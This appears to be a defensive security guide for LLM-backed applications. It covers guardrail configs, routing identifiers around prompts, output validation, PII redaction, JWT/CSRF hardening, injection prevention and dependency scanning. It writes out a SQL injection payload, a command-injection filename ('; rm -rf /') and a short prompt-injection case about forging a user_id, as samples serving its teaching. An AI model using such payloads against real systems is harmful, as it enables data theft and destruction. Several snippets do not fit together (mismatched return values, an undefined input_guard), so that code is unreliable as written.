- name: restricttotopic
parameters:
valid_topics: ["technology", "support"]
input:
flows:
- guardrailsai check input $validator="guardrails_pii"
output:
flows:
- guardrailsai check output $validator="toxic_language"
- guardrailsai check output $validator="restricttotopic"Correct -- Colang 2.0 fact-checking rails:
define flow answer question with facts
"""Enable fact-checking for RAG responses."""
user ...
$answer = execute rag()
$check_facts = True
bot $answer
define flow check hallucination
"""Block responses about people without verification."""
user ask about people
$check_hallucination = True
bot respond about peopleCorrect -- Guardrails AI validators in Python:
from guardrails import Guard
from guardrails.hub import ToxicLanguage, DetectPII, RestrictToTopic, ValidLength
guard = Guard().use_many(
ToxicLanguage(threshold=0.5, on_fail="filter"),
DetectPII(pii_entities=["EMAIL_ADDRESS", "PHONE_NUMBER", "SSN"], on_fail="fix"),
RestrictToTopic(valid_topics=["technology", "support"], on_fail="refrain"),
ValidLength(min=10, max=500, on_fail="reask"),
)
# Always validate BOTH input and output
input_result = input_guard.validate(user_input)
if not input_result.validation_passed:
return "Invalid input"
llm_output = llm.generate(input_result.validated_output)
output_result = guard(llm_api=openai.chat.completions.create, model="gpt-5.2",
messages=[{"role": "user", "content": user_input}])
if output_result.validation_passed:
return output_result.validated_outputKey decisions:
- NeMo for programmable flows (Colang 2.0), Guardrails AI for validators
- Toxicity threshold: 0.5 for content apps, 0.3 for children's apps
- PII handling: Redact for logs, block for outputs
- Topic restriction: Allowlist preferred over blocklist
- Always validate both input AND output
- Never use single validation layer
LLM: Content Filtering & Three-Phase Pattern — HIGH
Content Filtering & Three-Phase Pattern
The Three-Phase Pattern
Phase 1: PRE-LLM | Filter data, extract content, save refs
Phase 2: LLM CALL | Content-only prompt, no identifiers
Phase 3: POST-LLM | Validate output, attach attributionPhase 1: Pre-LLM (Filter & Extract)
async def prepare_for_llm(query: str, ctx: RequestContext):
# 1. Retrieve with tenant filter
documents = await semantic_search(
query_embedding=embed(query),
ctx=ctx, # Filters by tenant_id, user_id
)
# 2. Save references for attribution
source_refs = SourceRefs(
document_ids=[d.id for d in documents],
chunk_ids=[c.id for c in chunks],
)
# 3. Extract content only (no IDs)
content_texts = [strip_identifiers(d.content) for d in documents]
return query, content_texts, source_refs
def strip_identifiers(text: str) -> str:
"""Remove any IDs from content."""
text = re.sub(UUID_PATTERN, '[REDACTED]', text, flags=re.IGNORECASE)
for pattern in [r'user_id:\s*\S+', r'tenant_id:\s*\S+']:
text = re.sub(pattern, '[REDACTED]', text, flags=re.IGNORECASE)
return textPhase 2: LLM Call (Content Only)
def build_prompt(content: str, context_texts: list[str]) -> str:
prompt = f"""
Analyze the following content and provide insights.
CONTENT:
{content}
RELEVANT CONTEXT:
{chr(10).join(f"- {text}" for text in context_texts)}
"""
# AUDIT: Verify no IDs leaked
violations = audit_prompt(prompt)
if violations:
raise SecurityError(f"IDs leaked to prompt: {violations}")
return prompt
async def call_llm(prompt: str) -> dict:
"""LLM only sees content, never IDs."""
response = await llm.generate(prompt)
return parse_response(response)Phase 3: Post-LLM (Attribute)
async def save_with_attribution(
llm_output: dict, ctx: RequestContext, source_refs: SourceRefs,
) -> Analysis:
"""Attribution is DETERMINISTIC, not LLM-generated."""
# Validate no IDs in output
if re.search(UUID_PATTERN, str(llm_output)):
raise SecurityError("LLM output contains hallucinated IDs")
return await Analysis.create(
id=uuid4(), # We generate
user_id=ctx.user_id, # From context
tenant_id=ctx.tenant_id, # From context
trace_id=ctx.trace_id, # From context
source_document_ids=source_refs.document_ids, # From pre-LLM
content=llm_output["analysis"], # From LLM
key_concepts=llm_output["key_concepts"], # From LLM
created_at=datetime.now(timezone.utc),
)Complete Workflow
async def safe_analyze(query: str, ctx: RequestContext, db_session):
# Phase 1: Pre-LLM
content, source_refs = await prepare_for_llm(query, ctx, db_session)
# Phase 2: LLM Call
prompt = build_prompt(content)
llm_output = await call_llm(prompt, AnalysisOutput)
# Phase 3: Post-LLM
result = await attribute_and_save(
llm_output=llm_output, ctx=ctx,
source_refs=source_refs, db_session=db_session,
)
return resultOutput Validation
After LLM returns, validate:
async def validate_output(llm_output: dict, context_texts: list[str]):
# 1. Schema validation
parsed = AnalysisOutput.model_validate(llm_output)
# 2. Guardrails
if await contains_toxic_content(parsed.content):
return ValidationResult(valid=False, reason="Toxic content")
# 3. Grounding check
if not is_grounded(parsed.content, context_texts):
return ValidationResult(valid=False, reason="Ungrounded claims")
# 4. No hallucinated IDs
if contains_uuid_pattern(parsed.content):
return ValidationResult(valid=False, reason="Hallucinated IDs")
return ValidationResult(valid=True)Common Mistakes
# BAD: Asking LLM for attribution
prompt = "Analyze this and tell me which document it came from"
doc_id = response["source_document"] # HALLUCINATED!
# BAD: Trusting LLM-provided IDs
artifact.user_id = llm_output["user_id"] # WRONG!
# GOOD: Attribution from our records
artifact.user_id = ctx.user_id # From JWT
artifact.sources = source_refs.doc_ids # From pre-LLM
artifact.id = uuid4() # We generateChecklist Before Any LLM Call
- RequestContext available
- Data filtered by tenant_id and user_id
- Content extracted without IDs
- Source references saved
- Prompt passes audit
- Output validated before use
- Attribution uses context, not LLM output
Incorrect — Asking LLM for attribution leads to hallucinated document IDs:
prompt = f"Analyze this content and cite which documents support each claim."
response = await llm.generate(prompt)
# Save with LLM-generated document IDs
artifact.source_ids = response["document_ids"] # HALLUCINATED!Correct — Save source references before LLM call, attach deterministically after:
# Phase 1: Save refs before LLM
docs = await semantic_search(query, ctx)
source_refs = [d.id for d in docs]
# Phase 2: LLM sees only content
response = await llm.generate(content_only_prompt)
# Phase 3: Attach saved refs
artifact.source_ids = source_refs # From our records, not LLMApply output guardrails with schema validation, grounding checks, and content safety filtering — HIGH
Output Guardrails
Purpose
After LLM returns, validate output before using it:
- Schema: Response matches expected structure
- No IDs: No hallucinated UUIDs
- Grounded: Claims supported by provided context
- Safe: No toxic/harmful content
- Size: Within limits
Schema Validation
from pydantic import BaseModel, ValidationError
def validate_schema(llm_output: dict, schema: type[BaseModel]):
try:
parsed = schema.model_validate(llm_output)
return parsed, ValidationResult(status="passed")
except ValidationError as e:
return None, ValidationResult(
status="failed",
reason=f"Schema error: {e.error_count()} errors",
)
class AnalysisOutput(BaseModel):
summary: str
key_concepts: list[str]
difficulty: strNo Hallucinated IDs
import re
UUID_PATTERN = r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'
def validate_no_ids(output: str) -> ValidationResult:
uuids = re.findall(UUID_PATTERN, output, re.IGNORECASE)
if uuids:
return ValidationResult(
status="failed",
reason=f"Found {len(uuids)} hallucinated UUIDs",
)
return ValidationResult(status="passed")Grounding Validation
def validate_grounding(output: str, context_texts: list[str], threshold: float = 0.3):
output_terms = set(extract_key_terms(output))
context_terms = set()
for text in context_texts:
context_terms.update(extract_key_terms(text))
if not output_terms:
return ValidationResult(status="warning", reason="No key terms")
overlap = len(output_terms & context_terms) / len(output_terms)
if overlap < threshold:
return ValidationResult(
status="warning",
reason=f"Low grounding: {overlap:.2%}",
)
return ValidationResult(status="passed")Content Safety
async def validate_content_safety(output: str):
# PII detection
pii_patterns = {
"email": r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b',
"phone": r'\b\d{3}[-.]?\d{3}[-.]?\d{4}\b',
"ssn": r'\b\d{3}-\d{2}-\d{4}\b',
}
detected_pii = []
for pii_type, pattern in pii_patterns.items():
if re.search(pattern, output):
detected_pii.append(pii_type)
if detected_pii:
return ValidationResult(
status="warning",
reason=f"PII detected: {detected_pii}",
)
return ValidationResult(status="passed")Combined Validator
async def run_guardrails(
llm_output: dict,
context_texts: list[str],
schema: type[BaseModel],
) -> tuple[BaseModel | None, list[ValidationResult]]:
results = []
# 1. Schema
parsed, result = validate_schema(llm_output, schema)
results.append(result)
if not result.is_valid:
return None, results
output_str = str(llm_output)
# 2. No hallucinated IDs
results.append(validate_no_ids(output_str))
# 3. Grounding check
results.append(validate_grounding(output_str, context_texts))
# 4. Content safety
results.append(await validate_content_safety(output_str))
# 5. Size limits
results.append(validate_size(output_str))
failures = [r for r in results if r.status == "failed"]
if failures:
return None, results
return parsed, resultsAnti-Patterns
# BAD: No validation
artifact.content = llm_response["content"]
# BAD: Only schema validation
parsed = AnalysisOutput.parse_obj(response)
# BAD: Trusting LLM self-assessment
if llm_response.get("is_safe", True):
use_response(llm_response)
# GOOD: Full guardrail pipeline
parsed, results = await run_guardrails(
llm_output=response, context_texts=context, schema=AnalysisOutput,
)Incorrect — Trusting LLM output without validation allows toxic content and hallucinated IDs:
response = await llm.generate(prompt)
analysis = Analysis(
content=response["summary"], # Could be toxic
document_id=response["doc_id"], # Hallucinated UUID!
)
await db.save(analysis)Correct — Multi-layer guardrails validate schema, detect hallucinated IDs, and check grounding:
response = await llm.generate(prompt)
parsed, results = await run_guardrails(
llm_output=response, context_texts=context, schema=AnalysisOutput,
)
if not parsed:
raise ValidationError(f"Guardrails failed: {results}")
# Now safe to use parsed outputDefend against prompt injection by routing identifiers around the LLM, not through prompts — HIGH
Prompt Injection Defense
The Core Principle
Identifiers flow AROUND the LLM, not THROUGH it. The LLM sees only content. Attribution happens deterministically.
Why IDs in Prompts Are Dangerous
- Hallucination: LLM invents IDs that don't exist
- Confusion: LLM mixes up which ID belongs where
- Injection: Attacker manipulates IDs via prompt injection
- Leakage: IDs appear in logs, caches, traces
- Cross-tenant: LLM could reference other users' data
Forbidden Parameters in Prompts
| Parameter | Type | Why Forbidden |
|---|---|---|
user_id | UUID | Hallucination risk, cross-user access |
tenant_id | UUID | Critical for multi-tenant isolation |
analysis_id | UUID | Job tracking, not for LLM |
document_id | UUID | Source tracking, not for LLM |
session_id | str | Auth context, not for LLM |
api_key | str | Secret exposure |
| Any UUID | UUID | Pattern: [0-9a-f]\{8\}-... |
Detection Pattern
import re
FORBIDDEN_PATTERNS = [
r'user[_-]?id', r'tenant[_-]?id',
r'analysis[_-]?id', r'document[_-]?id',
r'session[_-]?id', r'trace[_-]?id',
r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
]
def audit_prompt(prompt: str) -> list[str]:
violations = []
for pattern in FORBIDDEN_PATTERNS:
if re.search(pattern, prompt, re.IGNORECASE):
violations.append(pattern)
return violationsSafe Prompt Builder
class SafePromptBuilder:
def __init__(self, strict: bool = True):
self._parts: list[str] = []
self._context: dict[str, Any] = {}
self._strict = strict
def add_system(self, instruction: str) -> "SafePromptBuilder":
audit = audit_text(instruction)
if not audit.is_clean:
raise PromptSecurityError("Forbidden content", audit.critical_violations)
self._parts.append(f"SYSTEM:\n{instruction}")
return self
def add_user_query(self, query: str) -> "SafePromptBuilder":
clean = self._sanitize(query)
self._parts.append(f"USER QUERY:\n{clean}")
return self
def add_context_documents(self, documents: list[str]) -> "SafePromptBuilder":
clean_docs = [self._sanitize(doc) for doc in documents]
formatted = "\n".join(f"- {doc}" for doc in clean_docs)
self._parts.append(f"CONTEXT:\n{formatted}")
return self
def store_context(self, key: str, value: Any) -> "SafePromptBuilder":
"""Store for attribution - NEVER included in prompt."""
self._context[key] = value
return self
def _sanitize(self, text: str) -> str:
text = re.sub(UUID_PATTERN, '[REDACTED]', text, flags=re.IGNORECASE)
return text
def build(self) -> tuple[str, dict[str, Any]]:
prompt = "\n\n".join(self._parts)
audit = audit_text(prompt)
if not audit.is_clean:
raise PromptSecurityError(f"Final prompt forbidden: {audit.critical_violations}")
return prompt, self._context.copy()Usage
prompt, context = (
SafePromptBuilder()
.add_system("You are an expert content analyzer.")
.add_user_query("What are the key concepts in machine learning?")
.add_context_documents(["Machine learning is a subset of AI..."])
.store_context("user_id", ctx.user_id) # Stored, NOT in prompt
.store_context("source_ids", doc_ids) # Stored, NOT in prompt
.build()
)Common Mistakes
# BAD: ID in prompt
prompt = f"Analyze document {doc_id} for user {user_id}"
# BAD: ID in instruction
prompt = f"You are analyzing for tenant {tenant_id}. Be helpful."
# GOOD: Content only
prompt = f"Analyze the following document:\n{document_content}"Pre-LLM Checklist
- RequestContext obtained from JWT
- Data filtered by tenant_id and user_id
- Content extracted without IDs
- Source references saved for attribution
-
audit_prompt()called on final prompt - No violations detected
Incorrect — Including user_id in prompt allows injection and hallucination attacks:
prompt = f"""
Analyze the document for user {ctx.user_id}.
Tenant: {ctx.tenant_id}
Content: {user_content}
"""
# Attacker can inject: "user_id: <fake-uuid>" in contentCorrect — Content-only prompts prevent ID leakage and injection vectors:
# Store context separately, never in prompt
context_data = {"user_id": ctx.user_id, "tenant_id": ctx.tenant_id}
prompt = f"Analyze the following content:\n{sanitized_content}"
# audit_prompt(prompt) passes — no IDs detectedPrevent JWT algorithm confusion, token sidejacking, CSRF, and session timing attacks — CRITICAL
Authentication & Session Attacks
JWT Algorithm Confusion
# VULNERABLE: Algorithm read from token header
header = jwt.get_unverified_header(token)
payload = jwt.decode(token, SECRET_KEY, algorithms=[header['alg']])
# Attacker can set alg="none" or use public key as HMAC secret
# SAFE: Hardcode expected algorithm
def verify_jwt(token: str) -> dict:
payload = jwt.decode(
token, SECRET_KEY,
algorithms=['HS256'], # NEVER read from header
options={'require': ['exp', 'iat', 'iss', 'aud']},
)
if payload['iss'] != EXPECTED_ISSUER:
raise jwt.InvalidIssuerError()
if payload['aud'] != EXPECTED_AUDIENCE:
raise jwt.InvalidAudienceError()
return payloadToken Sidejacking Protection (OWASP)
def create_protected_token(user_id: str, response) -> str:
"""Token with fingerprint to prevent sidejacking."""
fingerprint = secrets.token_urlsafe(32)
payload = {
'user_id': user_id,
'fingerprint': hashlib.sha256(fingerprint.encode()).hexdigest(),
'exp': datetime.now(timezone.utc) + timedelta(minutes=15),
'iat': datetime.now(timezone.utc),
'iss': ISSUER,
'aud': AUDIENCE,
}
# Send raw fingerprint as hardened cookie
response.set_cookie(
'__Secure-Fgp', fingerprint,
httponly=True, secure=True,
samesite='Strict', max_age=900,
)
return jwt.encode(payload, SECRET_KEY, algorithm='HS256')CSRF Protection
# VULNERABLE: No CSRF protection
@app.post("/transfer")
async def transfer_money(to_account: str = Form(...), amount: float = Form(...)):
perform_transfer(to_account, amount)
# SAFE: CSRF token validation
def verify_csrf_token(request: Request, csrf_token: str = Form(...)):
if request.session.get("csrf_token") != csrf_token:
raise HTTPException(status_code=403, detail="CSRF token mismatch")
@app.post("/transfer")
async def transfer_money(
to_account: str = Form(...), amount: float = Form(...),
_: None = Depends(verify_csrf_token),
):
perform_transfer(to_account, amount)# Alternative: SameSite cookies
response.set_cookie(
key="session_id", value=session_token,
httponly=True, secure=True,
samesite="strict", # Key CSRF protection
)Timing Attack Prevention
# VULNERABLE: Character-by-character comparison
def check_password(stored_hash: str, provided_hash: str) -> bool:
for a, b in zip(stored_hash, provided_hash):
if a != b:
return False # Early exit reveals info
return True
# SAFE: Constant-time comparison
import hmac
def check_password_secure(stored_hash: str, provided_password: str) -> bool:
provided_hash = hashlib.sha256(provided_password.encode()).hexdigest()
return hmac.compare_digest(stored_hash, provided_hash)
# Better: Use a proper library
from argon2 import PasswordHasher
ph = PasswordHasher()
ph.verify(stored_hash, password) # Handles timing safelySecurity Misconfiguration
# VULNERABLE: Debug mode in production
app.debug = True
# SAFE: Environment-based config
app.debug = os.getenv('FLASK_ENV') == 'development'
# VULNERABLE: CORS allow all
CORS(app, origins="*", allow_credentials=True)
# SAFE: Explicit origins
CORS(app, origins=["https://app.example.com"], allow_credentials=True)Vulnerable Components
# Scan for vulnerabilities
npm audit
pip-audit
# Fix vulnerabilities
npm audit fixJWT Security Checklist
- Hardcode algorithm (never read from header)
- Validate: exp, iat, iss, aud claims
- Short expiry (15 min - 1 hour)
- Use refresh token rotation for longer sessions
- Implement token denylist for logout/revocation
Detection
# JWT algorithm confusion
grep -rn "get_unverified_header\|algorithms=\[" --include="*.py" .
# Missing SameSite cookies
grep -rn "set_cookie\|setCookie" --include="*.py" . | grep -v "samesite"
# CSRF exempt decorators
grep -rn "@csrf_exempt" --include="*.py" .
# Timing attack vulnerable comparisons
semgrep --config "p/python-security-audit" .Incorrect — reading JWT algorithm from untrusted token header:
header = jwt.get_unverified_header(token)
payload = jwt.decode(token, SECRET_KEY, algorithms=[header['alg']])Correct — hardcoding expected algorithm with claim validation:
payload = jwt.decode(
token, SECRET_KEY,
algorithms=['HS256'],
options={'require': ['exp', 'iat', 'iss', 'aud']},
)Summary
| Vulnerability | Bandit ID | Fix |
|---|---|---|
| SQL Injection | B608 | Parameterized queries |
| JWT Algorithm | B105 | Hardcode algorithm |
| Timing Attack | B303 | hmac.compare_digest |
| XSS | N/A | textContent, escape() |
| CSRF | N/A | SameSite cookies, tokens |
Prevent SQL, command, and SSRF injection with parameterized queries and input validation — CRITICAL
Injection Prevention
SQL Injection
Vulnerable — user input directly interpolated into query:
# VULNERABLE: User input directly in query
query = f"SELECT * FROM users WHERE email = '{email}'"Safe — parameterized query and ORM:
# SAFE: Parameterized query
query = "SELECT * FROM users WHERE email = ?"
db.execute(query, [email])
# SAFE: ORM
db.query(User).filter(User.name == name).first()SQL Injection Attack Demo
Vulnerable — f-string interpolation allows injection payload:
# Vulnerable endpoint
@app.get("/users/search")
def search_users(username: str = Query(...)):
query = f"SELECT * FROM users WHERE username = '{username}'"
cursor.execute(query)
return cursor.fetchall()
# Attack payload: username = "' OR '1'='1' --"
# Resulting query: SELECT * FROM users WHERE username = '' OR '1'='1' --'
# Returns ALL usersSafe — parameterized query prevents injection:
@app.get("/users/search")
def search_users(username: str = Query(..., min_length=1, max_length=50)):
cursor.execute("SELECT * FROM users WHERE username = ?", (username,))
return cursor.fetchall()Command Injection
# VULNERABLE: User input in shell command
import os
os.system(f"convert {filename} output.png") # filename = "; rm -rf /"
# SAFE: subprocess with list args
import subprocess
subprocess.run(["convert", filename, "output.png"], check=True)SSRF (Server-Side Request Forgery)
# VULNERABLE: Fetch any URL
response = requests.get(user_provided_url)
# SAFE: Allowlist domains
ALLOWED = ['api.example.com']
if urlparse(url).hostname not in ALLOWED:
abort(400)
response = requests.get(url)Broken Access Control (IDOR)
# VULNERABLE: No authorization check
@app.get("/api/documents/{doc_id}")
def get_document(doc_id: int):
return db.query(Document).get(doc_id) # Anyone can access any doc
# SAFE: Authorization check
@app.get("/api/documents/{doc_id}")
def get_document(doc_id: int, current_user: User = Depends(get_current_user)):
doc = db.query(Document).get(doc_id)
if doc.owner_id != current_user.id and not current_user.is_admin:
raise HTTPException(403, "Access denied")
return docCryptographic Failures
# VULNERABLE: Weak hashing
import hashlib
password_hash = hashlib.md5(password.encode()).hexdigest()
# SAFE: Modern password hashing
from argon2 import PasswordHasher
ph = PasswordHasher()
password_hash = ph.hash(password)Insecure Deserialization
# VULNERABLE: Pickle from untrusted source
import pickle
data = pickle.loads(user_input) # Can execute arbitrary code
# SAFE: Use JSON
import json
data = json.loads(user_input) # Only parses dataDetection Commands
# Detect SQL injection patterns
grep -rn "f\"SELECT\|f\"INSERT\|f\"UPDATE\|f\"DELETE" --include="*.py" .
bandit -r . -t B608
# Detect command injection
semgrep --config "p/python-security-audit" .
# Detect SSRF
grep -rn "requests.get\|urllib.urlopen" --include="*.py" .Incorrect — interpolating user input directly into SQL query:
query = f"SELECT * FROM users WHERE email = '{email}'"
cursor.execute(query)Correct — using parameterized query to prevent injection:
cursor.execute("SELECT * FROM users WHERE email = ?", (email,))Quick Reference
| Vulnerability | Fix |
|---|---|
| SQL Injection | Parameterized queries, ORM |
| Command Injection | subprocess with list args |
| SSRF | URL domain allowlist |
| IDOR | Authorization check on every endpoint |
| Weak crypto | Argon2/bcrypt, not MD5/SHA1 |
| Insecure deserialization | JSON, not pickle |
Detect PII exposure through regex and ML-based patterns using Presidio and LLM Guard — HIGH
PII Detection Patterns
Regex-Based Detection
import re
def mask_pii(data, **kwargs):
"""Mask PII using regex patterns."""
if isinstance(data, str):
# Credit cards
data = re.sub(r'\b(?:\d[ -]*?){13,19}\b', '[REDACTED_CC]', data)
# Emails
data = re.sub(r'\b[\w.-]+@[\w.-]+\.\w+\b', '[REDACTED_EMAIL]', data)
# Phone numbers
data = re.sub(r'\b\d{3}[-.]?\d{3}[-.]?\d{4}\b', '[REDACTED_PHONE]', data)
# SSN
data = re.sub(r'\b\d{3}-\d{2}-\d{4}\b', '[REDACTED_SSN]', data)
return dataMicrosoft Presidio Pipeline
from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine
analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()
def detect_pii(text: str, language: str = "en") -> list:
return analyzer.analyze(
text=text, language=language,
entities=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD", "US_SSN"]
)
def anonymize_text(text: str, language: str = "en") -> str:
results = analyzer.analyze(text=text, language=language)
return anonymizer.anonymize(text=text, analyzer_results=results).textPresidio Custom Operators
from presidio_anonymizer.entities import OperatorConfig
operators = {
"PERSON": OperatorConfig("replace", {"new_value": "[PERSON]"}),
"CREDIT_CARD": OperatorConfig("mask", {"masking_char": "*", "chars_to_mask": 12}),
"EMAIL_ADDRESS": OperatorConfig("hash", {"hash_type": "sha256"}),
"US_SSN": OperatorConfig("redact"),
}
anonymized = anonymizer.anonymize(text=text, analyzer_results=results, operators=operators)Custom Recognizers
from presidio_analyzer import Pattern, PatternRecognizer
internal_id_recognizer = PatternRecognizer(
supported_entity="INTERNAL_ID",
patterns=[Pattern(name="internal_id", regex=r"ID-[A-Z]{2}-\d{6}", score=0.9)]
)
analyzer.registry.add_recognizer(internal_id_recognizer)LLM Guard Anonymization
from llm_guard.input_scanners import Anonymize
from llm_guard.vault import Vault
vault = Vault()
scanner = Anonymize(
vault=vault, language="en",
entity_types=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD"],
use_faker=True, # Replace with fake data
)
def sanitize_input(prompt: str) -> tuple[str, bool, float]:
sanitized_prompt, is_valid, risk_score = scanner.scan(prompt)
return sanitized_prompt, is_valid, risk_score
# "My name is Jane Smith" -> "My name is [REDACTED_PERSON_1]"LLM Guard Output Scanning
from llm_guard.output_scanners import Sensitive
sensitive_scanner = Sensitive(
entity_types=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD"],
redact=True,
threshold=0.5,
)
def check_output_for_pii(prompt: str, output: str):
sanitized_output, is_valid, risk_score = sensitive_scanner.scan(prompt, output)
return sanitized_output, is_valid, risk_scoreAnti-Patterns
# NEVER log raw PII
logger.info(f"User email: {user.email}")
# NEVER send unmasked data to observability
langfuse.trace(input=raw_prompt)
# ALWAYS mask before logging
logger.info(f"User email: {mask_pii(user.email)}")
# ALWAYS use mask callback
langfuse = Langfuse(mask=mask_pii)Key Decisions
| Decision | Recommendation |
|---|---|
| Detection engine | Presidio (enterprise), regex (simple), LLM Guard (LLM pipelines) |
| Masking strategy | Replace with type tokens [REDACTED_EMAIL] |
| Performance | Async/batch for high-throughput |
| Reversibility | LLM Guard Vault for deanonymization |
Incorrect — Logging raw user input exposes PII to log aggregators:
logger.info(f"Processing request for {user.email}")
# Logs: "Processing request for john.doe@company.com"Correct — Detect and mask PII before logging using Presidio:
from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine
results = analyzer.analyze(text=user.email, language="en")
masked = anonymizer.anonymize(text=user.email, analyzer_results=results).text
logger.info(f"Processing request for {masked}")
# Logs: "Processing request for [EMAIL_ADDRESS]"Redact PII from logs and traces automatically in Langfuse, structlog, and observability tools — HIGH
PII Redaction & Observability Integration
Langfuse Mask Callback
import re
from langfuse import Langfuse
PII_PATTERNS = {
"email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
"phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
"ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
}
def mask_pii(data: dict) -> dict:
def redact_string(value: str) -> str:
for entity_type, pattern in PII_PATTERNS.items():
value = pattern.sub(f'[REDACTED_{entity_type.upper()}]', value)
return value
def redact_recursive(obj):
if isinstance(obj, str):
return redact_string(obj)
elif isinstance(obj, dict):
return {k: redact_recursive(v) for k, v in obj.items()}
elif isinstance(obj, list):
return [redact_recursive(item) for item in obj]
return obj
return redact_recursive(data)
langfuse = Langfuse(mask=mask_pii)Langfuse with Presidio
from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine
analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()
def presidio_mask(data: dict) -> dict:
def anonymize_string(value: str) -> str:
if len(value) < 5:
return value
results = analyzer.analyze(text=value, language="en")
if results:
return anonymizer.anonymize(text=value, analyzer_results=results).text
return value
def process_recursive(obj):
if isinstance(obj, str):
return anonymize_string(obj)
elif isinstance(obj, dict):
return {k: process_recursive(v) for k, v in obj.items()}
elif isinstance(obj, list):
return [process_recursive(item) for item in obj]
return obj
return process_recursive(data)
langfuse = Langfuse(mask=presidio_mask)Structlog PII Processor
import structlog
PII_PATTERNS = {
"email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
"phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
"ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
"credit_card": re.compile(r'\b(?:\d[ -]*?){13,19}\b'),
}
def redact_pii(logger, method_name: str, event_dict: dict) -> dict:
def redact_value(value):
if isinstance(value, str):
result = value
for entity_type, pattern in PII_PATTERNS.items():
result = pattern.sub(f'[REDACTED_{entity_type.upper()}]', result)
return result
elif isinstance(value, dict):
return {k: redact_value(v) for k, v in value.items()}
elif isinstance(value, list):
return [redact_value(item) for item in value]
return value
return {k: redact_value(v) for k, v in event_dict.items()}
structlog.configure(processors=[
structlog.processors.add_log_level,
structlog.processors.TimeStamper(fmt="iso"),
redact_pii,
structlog.processors.JSONRenderer(),
])Loguru PII Filter
from loguru import logger
def pii_filter(record):
message = record["message"]
for entity_type, pattern in PII_PATTERNS.items():
message = pattern.sub(f'[REDACTED_{entity_type.upper()}]', message)
record["message"] = message
return True
logger.remove()
logger.add("logs/app.log", filter=pii_filter, serialize=True)
# Usage
logger.info("User john@example.com logged in from 192.168.1.1")
# Output: "User [REDACTED_EMAIL] logged in from [REDACTED_IP]"Field-Specific Redaction
SENSITIVE_FIELDS = {
"email", "phone", "ssn", "credit_card", "password",
"api_key", "token", "secret", "authorization"
}
def smart_redact_processor(logger, method_name, event_dict):
result = {}
for key, value in event_dict.items():
if key.lower() in SENSITIVE_FIELDS:
result[key] = "[REDACTED]"
elif isinstance(value, str):
result[key] = redact_pii_patterns(value)
else:
result[key] = value
return resultLLM Guard Deanonymization
from llm_guard.input_scanners import Anonymize
from llm_guard.output_scanners import Deanonymize
from llm_guard.vault import Vault
vault = Vault()
anonymize = Anonymize(vault=vault, language="en")
deanonymize = Deanonymize(vault=vault)
# Anonymize input
sanitized_prompt, _, _ = anonymize.scan(original_prompt)
# Call LLM with sanitized input
llm_response = await llm.generate(sanitized_prompt)
# Restore original values in output
restored_output, _, _ = deanonymize.scan(sanitized_prompt, llm_response)Full Secure Pipeline
class SecureLLMPipeline:
def __init__(self):
self.vault = Vault()
self.anonymize = Anonymize(vault=self.vault, language="en")
self.deanonymize = Deanonymize(vault=self.vault)
self.sensitive_check = Sensitive(redact=True)
async def process(self, user_input: str) -> str:
# 1. Anonymize input
sanitized_input, _, input_risk = self.anonymize.scan(user_input)
# 2. Call LLM with sanitized input
llm_response = await self.llm.generate(sanitized_input)
# 3. Check output for leaked PII
checked_output, _, output_risk = self.sensitive_check.scan(
sanitized_input, llm_response
)
# 4. Deanonymize for user
final_output = self.deanonymize.scan(sanitized_input, checked_output)[0]
return final_outputTesting
def test_pii_redaction_in_logs():
output = StringIO()
structlog.configure(
processors=[redact_pii, structlog.processors.JSONRenderer()],
logger_factory=structlog.WriteLoggerFactory(file=output),
)
logger = structlog.get_logger()
logger.info("test", email="test@example.com", ssn="123-45-6789")
log_output = output.getvalue()
assert "test@example.com" not in log_output
assert "123-45-6789" not in log_output
assert "[REDACTED_EMAIL]" in log_output
assert "[REDACTED_SSN]" in log_outputIncorrect — Sending raw prompts to Langfuse leaks PII to observability platform:
langfuse = Langfuse()
trace = langfuse.trace(
input="My email is john@example.com and SSN is 123-45-6789"
)
# PII stored in Langfuse without redactionCorrect — Mask callback automatically redacts PII before sending to Langfuse:
langfuse = Langfuse(mask=mask_pii)
trace = langfuse.trace(
input="My email is john@example.com and SSN is 123-45-6789"
)
# Stored as: "My email is [REDACTED_EMAIL] and SSN is [REDACTED_SSN]"Scan dependencies for CVEs, detect committed secrets, and run SAST to catch vulnerabilities before production — CRITICAL
Dependency Scanning
Automate vulnerability detection in package dependencies before deployment.
Incorrect — ignoring audit output:
npm audit # Runs but nobody checks the result
npm install # Proceeds regardless of vulnerabilitiesCorrect — automated scanning with severity gates:
# JavaScript (npm)
npm audit --json > security-audit.json
CRITICAL=$(npm audit --json | jq '.metadata.vulnerabilities.critical')
HIGH=$(npm audit --json | jq '.metadata.vulnerabilities.high')
if [ "$CRITICAL" -gt 0 ] || [ "$HIGH" -gt 0 ]; then
echo "BLOCK: $CRITICAL critical, $HIGH high vulnerabilities"
exit 1
fi
# Auto-fix safe updates
npm audit fix# Python (pip-audit)
pip-audit --format=json > security-audit.json
# Alternative: safety
safety check --json > security-audit.json# Container images (Trivy)
trivy image myapp:latest --format json > trivy-scan.json
CRITICAL=$(cat trivy-scan.json | jq '[.Results[].Vulnerabilities[]? | select(.Severity == "CRITICAL")] | length')Escalation thresholds:
| Severity | Threshold | Action |
|---|---|---|
| Critical | Any | BLOCK deployment |
| High | > 5 | BLOCK deployment |
